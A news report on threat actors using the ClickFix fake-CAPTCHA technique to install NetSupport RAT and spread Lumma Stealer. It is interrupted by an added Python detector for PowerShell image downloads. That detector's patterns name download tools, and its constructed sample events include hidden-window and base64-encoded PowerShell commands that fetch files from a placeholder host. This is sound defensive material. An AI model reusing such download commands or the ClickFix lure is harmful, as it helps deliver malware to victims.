Threat actors use ClickFix to install NetSupport RAT in the most recent cyberattacks.

Feb 11, 2025 | Ravie Lakshmanan | Malware / Cyber Attack

Threat actors have been observed using the increasingly prevalent ClickFix technique to distribute a remote access trojan named NetSupport RAT since early 2025.

NetSupport RAT, commonly propagated via bogus websites and fake browser updates, grants attackers full control over the victim’s host, allowing them to monitor the device’s screen in real time, control the keyboard and mouse, upload and download files, and launch and execute malicious commands.

Previously known as NetSupport Manager, it was developed as a legitimate remote IT support program, but has since been repurposed by malicious actors to target businesses and capture sensitive information, including pictures, audio, video, and data.

In an analysis, eSentire reported that ClickFix is a technique in which threat actors inject a fake CAPTCHA webpage on compromised websites and instruct users to follow specific steps to copy and execute malicious PowerShell commands on their hosts, which download and run malware payloads.

In the attack chains identified by the cybersecurity company, the PowerShell command is used to download and run the NetSupport RAT client from a remote server that hosts the malicious components in the form of PNG image files.
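A defensive illustration of the chain described above, added here and not taken from eSentire or the original article: a Python heuristic that flags PowerShell process-creation events whose command line, including any `-EncodedCommand` payload, downloads a URL ending in an image extension. The event field names, the `files.example` host and the sample events are constructed assumptions.

```python
import base64
import re

# Download primitives usable from a PowerShell one-liner (cmdlets, aliases, .NET methods).
DOWNLOAD = re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                      r"start-bitstransfer|downloadfile|downloadstring|downloaddata)\b")
# Remote URL whose path ends in an image extension (the article reports PNG).
IMAGE_URL = re.compile(r"(?i)https?://[^\s'\"()]+\.(?:png|jpe?g|gif|bmp)\b")
# -EncodedCommand and its abbreviations (-e, -ec, -enc, ...) followed by a base64 blob.
ENCODED = re.compile(r"(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")


def expand(cmdline):
    """Return the command line plus the decoded text of any -EncodedCommand blob."""
    parts = [cmdline]
    for blob in ENCODED.findall(cmdline):
        try:  # PowerShell expects the script as base64 over UTF-16LE
            parts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:  # not base64 or not UTF-16LE: leave it undecoded
            pass
    return "\n".join(parts)


def is_suspicious(event):
    """True when PowerShell is asked to download something served as an image file."""
    if not event["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    text = expand(event["CommandLine"])
    return bool(DOWNLOAD.search(text) and IMAGE_URL.search(text))


def scan(events):
    """Return the Ids of the events that match the heuristic."""
    return [e["Id"] for e in events if is_suspicious(e)]


# Constructed sample events (not real telemetry); files.example is a placeholder host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BLOB = base64.b64encode("iwr https://files.example/2.png -OutFile c.png".encode("utf-16-le")).decode()
EVENTS = [
    {"Id": 1, "Image": PS, "CommandLine": 'powershell -w hidden -c "iwr https://files.example/1.png -OutFile a.png"'},
    {"Id": 2, "Image": PS, "CommandLine": "powershell -nop -enc " + BLOB},
    {"Id": 3, "Image": PS, "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},
    {"Id": 4, "Image": r"C:\Program Files\Browser\browser.exe", "CommandLine": "browser.exe https://files.example/logo.png"},
    {"Id": 5, "Image": PS, "CommandLine": "powershell -ExecutionPolicy Bypass -File update.ps1"},
]

if __name__ == "__main__":
    print(scan(EVENTS))
```

A match is a triage lead rather than a verdict: legitimate scripts do fetch images, so pair it with context such as the parent process and what happens to the downloaded file afterwards.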

The development comes as the ClickFix method is also being used to spread an updated version of the Lumma Stealer malware that decrypts a configuration file containing a list of command-and-control (C2) servers.

These modifications provide insight into the evasive strategies used by the developers, who are actively working to circumvent current extraction and analysis tools, according to eSentire.
